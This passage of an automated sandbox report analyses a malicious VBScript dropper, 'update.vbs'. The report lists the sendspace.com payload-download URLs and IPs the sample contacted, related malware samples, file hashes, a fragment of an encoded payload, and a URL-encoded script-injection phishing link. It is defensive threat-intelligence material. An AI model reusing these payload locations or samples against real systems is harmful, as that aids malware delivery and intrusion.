                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/7dhid7XRpowershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/7dhid7Ppowershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspace.com/wab.exe, 00000008.00000002.2724545147.000000000069D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n1.sendspaXpowershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs13n1.sendspace.compowershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n1.sendspace.com0powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.microtpowershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    69.31.136.17
                    		fs03n2.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse
                    104.21.28.80
                    		www.sendspace.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    69.31.136.57
                    		fs13n1.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1446633
                    Start date and time:2024-05-23 18:24:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:update.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@13/9@3/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 68%
                    • Number of executed functions: 22
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 1988 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2624 because it is empty
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: update.vbs

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:25:04API Interceptor21024x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    69.31.136.17DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                      JAN_YDHM007390.vbsGet hashmaliciousUnknownBrowse
                        UGH82MSGHWUSHSDHWQOL.vbsGet hashmaliciousUnknownBrowse
                          1st_Payment.vbsGet hashmaliciousRevengeBrowse
                            69.31.136.57https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                              #W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                                1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                  1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                    QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                      QA6433_#002.vbsGet hashmaliciousnjRatBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        fs03n2.sendspace.comDOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                        • 69.31.136.17
                                        JAN_YDHM007390.vbsGet hashmaliciousUnknownBrowse
                                        • 69.31.136.17
                                        fs13n1.sendspace.com#W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                                        • 69.31.136.57
                                        www.sendspace.comhttps://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                        • 172.64.104.11
                                        RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.htmlGet hashmaliciousUnknownBrowse
                                        • 172.67.161.115
                                        https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                        • 104.21.91.185
                                        DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                        • 172.64.202.8
                                        SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exeGet hashmaliciousGuLoaderBrowse
                                        • 172.64.108.22
                                        RdMr3o5vB2.exeGet hashmaliciousCryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, SocelarsBrowse
                                        • 172.67.141.102
                                        New Order.exeGet hashmaliciousOski Stealer VidarBrowse
                                        • 172.67.141.102
                                        QzvyuYJlDX.exeGet hashmaliciousUnknownBrowse
                                        • 104.21.41.17
                                        XZ22CfAOCN.exeGet hashmaliciousRedLine SmokeLoader Tofsee VidarBrowse
                                        • 172.64.173.34
                                        eLc127EVdf.exeGet hashmaliciousRedLine SmokeLoader TofseeBrowse
                                        • 104.21.81.195

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSwindows.vbsGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                        • 104.17.2.184
                                        http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                                        • 188.114.96.3
                                        ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.2.184
                                        30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.74.152
                                        https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                        • 104.18.138.17
                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 104.26.12.205
                                        https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharingGet hashmaliciousUnknownBrowse
                                        • 172.64.41.3
                                        http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.comGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.24.120
                                        GTT-BACKBONEGTTDEhttp://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                        • 69.167.127.106
                                        http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                        • 69.167.127.106
                                        la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                        • 69.31.5.255
                                        TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                        • 208.97.218.33
                                        81#Uff09.exeGet hashmaliciousUnknownBrowse
                                        • 23.62.176.141
                                        YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                        • 212.222.82.254
                                        M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                        • 74.199.145.209
                                        kuzen.vbsGet hashmaliciousUnknownBrowse
                                        • 23.62.176.141
                                        JvULMWY21C.elfGet hashmaliciousUnknownBrowse
                                        • 66.227.51.92
                                        NnS9ImJPht.elfGet hashmaliciousUnknownBrowse
                                        • 154.15.125.182
                                        GTT-BACKBONEGTTDEhttp://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                        • 69.167.127.106
                                        http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                        • 69.167.127.106
                                        la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                        • 69.31.5.255
                                        TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                        • 208.97.218.33
                                        81#Uff09.exeGet hashmaliciousUnknownBrowse
                                        • 23.62.176.141
                                        YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                        • 212.222.82.254
                                        M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                        • 74.199.145.209
                                        kuzen.vbsGet hashmaliciousUnknownBrowse
                                        • 23.62.176.141
                                        JvULMWY21C.elfGet hashmaliciousUnknownBrowse
                                        • 66.227.51.92
                                        NnS9ImJPht.elfGet hashmaliciousUnknownBrowse
                                        • 154.15.125.182

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0ewindows.vbsGet hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        https://mydhl.express.dhl$tracking_link/Get hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        https://one.acme.si/sagecn/fr.htmlGet hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        https://organic.mushroomstrade%5B.%5Dcom/?aNqBNW=Nm&rd_DyKZBUOXd0TNevGZu3_F7iSKU5CUSZG11cnJheUBtZXJjaGFudHNjYXBpdGFsLmNvbQ==Get hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.57
                                        37f463bf4616ecd445d4a1937da06e19windows.vbsGet hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        Clear.7zGet hashmaliciousUnknownBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        msimg32.dllGet hashmaliciousRemcosBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17
                                        INVOICE.jsGet hashmaliciousAgentTeslaBrowse
                                        • 104.21.28.80
                                        • 69.31.136.17

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.8908305915084105
                                        Encrypted:false
                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllultnxj:NllU
                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\3582-490\wab.exe

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):475136
                                        Entropy (8bit):6.119576160135665
                                        Encrypted:false
                                        SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                        MD5:72AD21D191B58842334D32A381EA7FA8
                                        SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                        SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                        SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                        Malicious:false
                                        Reputation:low
                                        Preview:.g..N..#cr.Y...N[....E)..qR..B....?..:.\...q|.E'=....T5..X.<:r.go.f./...T.....0~a.#Xt8vG#B~.i..d.@n<...M.._.^...M%.s...D.....f..#....0......&.Am5....u.H3.w.2m....[..SsP\...!K..W...DYF!.O......8L....6.d.=SG.=.........3..Ux....Xr.Tj@.f...n....QFT .g.2C^...{...P.f...ba..M"..iU.....d..p...Z..9._...7.<......hC>.....aM....BZ..08..;."..=........<_!.}.....+.........F\......Q.tX..I]L....>.1..Q..<......f`.g.M.N.........!..!_...Q./.."yZ."[.yw.[...Mq-..G......?......./..#.{k...9>....LI?.A.I/......1...&.p..Vp..l..q..oO.st.R...f..._......?..d...........BR.......2&.....q1.z...x.\.V...J.M..0....,.y...GH./4o..;M...z.....qq..U.....n.....Pw.G.)9..........b...w.l...aJAV..o..../..Yg..l.h..PT>...i].i.JGkA/....X^..j..R.5.)...tA.k3..e.s|.,....),./......%..G(.(P.E.....B....6....)J#!....*1.>..#.h..d......vE9.......[[.0.....w......lJ....nE.h....E].6..,..B.%..#.B.:...X.g+^{O.r...u.......c.D.;.6=.?.u.6S....f.I..j...l.s.....%N.H.{..dW..).L.....d...!.....&......oR

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcqrymq3.s22.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3rwko11.bvi.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhs4m25p.jzj.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4n2wmog.lxm.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\tmp5023.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):8
                                        Entropy (8bit):3.0
                                        Encrypted:false
                                        SSDEEP:3:xQYn:9
                                        MD5:CCA1849F2B8048EF39DAF2E81AD83449
                                        SHA1:54C8DDD7319A436A7170CD2BF5D361CB6E4FCC37
                                        SHA-256:3DB18015579C84EBB08AA559B2495F9431C4DFA9F9111E1A6DC97ACF57A2ABD0
                                        SHA-512:CACFEED7ED0DE701ABDBD21BB38D86FF939E782E27A5844E5C2D682003C2D7EED1341800D64329AC83C51480BF8DBD118995AFE7646C7AF37C09E8D2E06BCECD
                                        Malicious:false
                                        Preview:..F...&A

                                        C:\Users\user\AppData\Roaming\Acetylmethylcarbinol.Ron

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):412172
                                        Entropy (8bit):5.950223579896966
                                        Encrypted:false
                                        SSDEEP:6144:bKpwWrsZRzpbHCsCKrsJoSN8d8wWfp6hWIQbR5JW4545i2a+AWp3u8J:eprrKRdbiorsuSJAW55JWk453ZvJ
                                        MD5:614C0D722BE9595DBBDFDBADFA5EED36
                                        SHA1:6B5B83F8047285A0A95976F45457EB634D3149FB
                                        SHA-256:20C30E12F74FC4439417990B3F7531D135BA2333C6023F727F3AA3B3B3B33DB8
                                        SHA-512:C4422A467A8C0B3C02460F5EC37090B11FAA15B4A59684C584FBF76F746ADFDDED29DBB4474B4635B7B5BCC31AA05C48A087CC77096E0ED870DBEE7C9DF7EE70
                                        Malicious:false
                                        Preview:6wKIGusCG2K7XqEPAHEBm3EBmwNcJARxAZtxAZu5ofhCDusCeZdxAZuB8cjGXqtxAZtxAZuB6Wk+HKXrAl7R6wLngnEBm+sCsiq6uj0e43EBm+sC2uxxAZvrAq4rMcrrAqz1cQGbiRQL6wKdoesCJX3R4nEBm3EBm4PBBOsC6sVxAZuB+WIR0wF8y+sCCfzrAobji0QkBOsCqn5xAZuJw3EBm+sCLFWBw9aMGgHrApSZcQGbupo2yMzrAs6+cQGbgfJMXu+KcQGbcQGbgcIql9i5cQGbcQGbcQGbcQGbcQGbcQGbiwwQ6wJ1iesCxGaJDBPrAuTIcQGbQnEBm+sCunyB+jBKBAB11XEBm3EBm4lcJAxxAZtxAZuB7QADAADrAmfD6wIED4tUJAhxAZtxAZuLfCQEcQGbcQGbietxAZtxAZuBw5wAAADrAjOScQGbU+sCdMhxAZtqQOsCnYdxAZuJ6+sCFFNxAZvHgwABAAAAwOUBcQGb6wJs94HDAAEAAHEBm+sCXhFTcQGb6wKSQ4nrcQGbcQGbibsEAQAA6wJAEesCcKSBwwQBAABxAZvrAv0uU+sCvClxAZtq/+sCHSPrAnOjg8IF6wLLyXEBmzH2cQGb6wLOfjHJ6wLItusCNqiLGusCFnrrAv5iQXEBm3EBmzkcCnX06wJaiHEBm0ZxAZtxAZuAfAr7uHXfcQGb6wIAmotECvxxAZtxAZsp8HEBm+sC4Uz/0usC/AtxAZu6MEoEAOsCKPpxAZsxwHEBm3EBm4t8JAxxAZtxAZuBNAedHXMjcQGb6wIADIPABHEBm3EBmznQdeXrAulycQGbiftxAZvrAncg/9dxAZvrAuQQYeqwKw5rZ6p4nJ+4W5FyolmGsK+cSPrGJKsDv+Scgrp9KSWibGofKyucgmNhvep1I+IjhvCejXOSk7kbmR0tomQUMb6y2jcunZuj1yGcBy6dWxuboJwHLp1xm/MfmaCi2RBzdzJ+j0Vq2xF4

                                        Static File Info

                                        General

                                        File type:ASCII text, with CRLF line terminators
                                        Entropy (8bit):5.072724125125465
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:update.vbs
                                        File size:74'564 bytes
                                        MD5:7bc04c5410cd2c7395ba82859240fea6
                                        SHA1:014f8e77cdedd5141c80a316fc91741efdca8586
                                        SHA256:3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a
                                        SHA512:dde32bb051839b4d65edafde2189d56cd39489b70950b0ba6c4eaeb538ddac55201159995b41e9a380326cf4ad8d4703b1d25e169d71e64aab4f4ae5d6fdfb64
                                        SSDEEP:1536:b0eys3Ih0nYdMOuImdjnQKOYVDDoUFYtBQBpPz5lEiFG7A:b0E7Y+OXmJnS2/AXQP1xG7A
                                        TLSH:9B734BA1EA5D09164D4F37A9EC919982C6BCC605C22331A4FDCA178EA00B55CB3FD6DF
                                        File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Vandseng = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman solitid

                                        File Icon

                                        Icon Hash:68d69b8f86ab9a86

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 23, 2024 18:25:05.374051094 CEST49704443192.168.2.5104.21.28.80
                                        May 23, 2024 18:25:05.374104977 CEST44349704104.21.28.80192.168.2.5
                                        May 23, 2024 18:25:05.374196053 CEST49704443192.168.2.5104.21.28.80
                                        May 23, 2024 18:25:05.382466078 CEST49704443192.168.2.5104.21.28.80
                                        May 23, 2024 18:25:05.382487059 CEST44349704104.21.28.80192.168.2.5
                                        May 23, 2024 18:25:05.860708952 CEST44349704104.21.28.80192.168.2.5
